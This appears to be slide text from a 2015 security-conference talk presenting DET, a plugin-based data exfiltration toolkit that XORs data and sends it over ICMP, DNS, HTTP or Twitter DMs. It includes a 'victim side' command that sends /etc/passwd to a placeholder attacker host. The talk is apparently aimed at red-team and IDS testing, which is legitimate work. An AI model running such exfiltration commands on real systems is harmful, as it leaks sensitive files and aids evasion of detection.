23th of October 2015
Paul Amar @SensePost
Data Exfiltration Toolkit (DET)
- Modular (Plugins)
- Supports ICMP, DNS, HTTP and Twitter DMs
- One file - det.py (client/server)
- Plugins based (in ./plugins)
- Listens on specific services (DNS, HTTP, Twitter, ICMP)
- Each module can have its own logic, Sweet eh?
- Takes a chunk of data, XOR it and sends it.
- Plugin chosen randomly for each 'message'
How to use it?
Server (Attacker Side)
Client (Victim Side)
(sudo) python det.py -v -L
(sudo) python det.py -f /etc/passwd -t x.x.x.x -v
- Wanna contribute? PR your Plugins
- Release this on GitHub
- Test it against IDS (with SecData?)